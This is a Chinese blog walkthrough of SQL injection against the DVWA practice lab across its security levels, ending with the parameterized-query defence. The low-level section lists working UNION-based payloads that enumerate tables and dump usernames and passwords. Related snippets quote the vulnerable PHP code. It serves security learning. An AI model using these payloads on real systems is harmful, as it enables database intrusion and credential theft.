DVWA的使用3–SQL Injection(SQL注入)

最新推荐文章于 2024-07-14 18:06:23 发布
最新推荐文章于 2024-07-14 18:06:23 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 漏洞 dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjw0411/article/details/79714618
版权
DVWA的使用3–SQL Injection(SQL注入)

通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

1).low级别

源码:
这里写图片描述
对前端传递进来的参数ID没有做任何过滤和检测,对于提交的请求直接参与SQL代码的查询。
漏洞利用:
这里写图片描述
直接构造PAYLOAD:
查询列数:1’ order by 2;#
union查询:1’ union select 1,2;#
查询用户与数据库名:1’ union select database(),current_user();#
查询表:1’ union select 1, group_concat(table_name) from information_schema.tables where table_schema=database();#
查询列:1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=’users’;#
查询值:1’ union select group_concat(user_id,first_name,last_name),group_concat(password) from users; #

2).medium级别

源码:
这里写图片描述
漏送利用:
下拉列表限制用户输入,使用burp suite抓包修改即可绕过限制。
这里写图片描述
这里写图片描述

3).high级别

源码:
这里写图片描述
查询语句获取ID时,增加了单引号,所以这是个字符型注入,limit 1限制了只能查询一个结果,这个用注释#就可以绕过。
这里写图片描述
这里写图片描述

4).impossible级别

源码:
这里写图片描述
使用了pdo实现数据代码分离,而且针对查询结果进行限制,只有1条时才会输出,提高了一定的安全性。

更多dvwa的使用及漏洞利用:https://blog.csdn.net/zjw0411/article/category/7542496

StoriesWine
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL Injectionsql注入
MzHeader的博客
03-22 1594
DWVA-SQL Injectionsql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面...
DVWA-SQL注入
HoYim
03-03 480
low 1.判断注入类型 输入1’and’1’=’1 输入1’and’1’=’2 无结果 输入1’or’1’=’1 类似1’or’1234’=’1234 由此判断为字符型注入 2.判断字段数 ORDER BY 1 表示 所select 的字段按第一个字段排序,当后面跟的数字超过字段数时,则显示错误 输入1’ order by 1 输入1’ order by 2 输入1’ order b...
DVWASQL Injection
baynk的博客
10-29 1694
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
SQL Injection(Blind)(SQL注入之盲注)
最新发布
qq_59706867的博客
07-14 1385
SQL Injection(Blind),SQL盲注,相比于常规的SQL注入,他不会将返回具体的数据信息或语法信息,只会将服务器包装后的信息返回到页面中。
DVWA下的SQL注入
07-25
SQL
dvwasql注入
BAIXUAN9527的博客
03-27 527
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
DVWA-SQL InjectionSQL 注入)
weixin_50342860的博客
08-28 368
目录风险lowmediumhigh修复扩展 风险 是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限沦陷)。 手工注入常规思路 判断是否存在注入,注入是字符型还是数字型 猜解SQL查询语句中的字段数 确定回显位置 获取当前数据库 获取数据库中的表 获取表中的字段名 得到数据 low 分析源码,可以看到对前端传入的参数id没有做任何的过滤,明显存在手工注入,直接带入数
DVWA靶场SQL InjectionSQL注入
m0_51150495的博客
06-08 1458
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆数据库名和版本号;6.已知数据库名后使用union select爆表名和列名;7.最后爆列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时现报错,说明列数为
DVWAsql注入SQL Injection
qq_54537919的博客
06-25 780
DVWAsql注入SQL Injection)全等级low、medium、high
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2827
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2106
SQL注入与自动注入
DVWASQL注入
RexHa的博客
09-27 2112
DVWA靶场sql注入三个级别通关
dvwaSQL Injection
kukudeshuo的博客
03-03 237
dvwaSQL Injection Security Level: low 由源代码可知,对字符串没有进行任何过滤 输入 1' and 1=1# 结果 ID: 1' and 1=1# First name: admin Surname: admin 输入 1' and 1=2# 结果为空白,说明存在SQL注入漏洞 判断字段数 1' order by 2# 结果: ID: 1' order by 2# First name: admin Surname: admin 1' order by 3
dvwasql injection
Alsn86的博客
01-18 266
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
DVWASQL Injection
weixin_42075643的博客
02-19 354
SQL注入基础知识
DVWA——SQL Injection
qq_41007744的博客
05-23 394
SQL InjectionLow&lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE ...
DVWA实验:SQL注入入门指南
SQLInjection标签下,用户通过在`userid`输入框中输入不同的值来识别注入类型。例如,输入数字时,服务器报错提示语法错误,表明注入可能是字符型注入,因为输入的单引号干扰了原始SQL语句的解析。 进一步验证...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值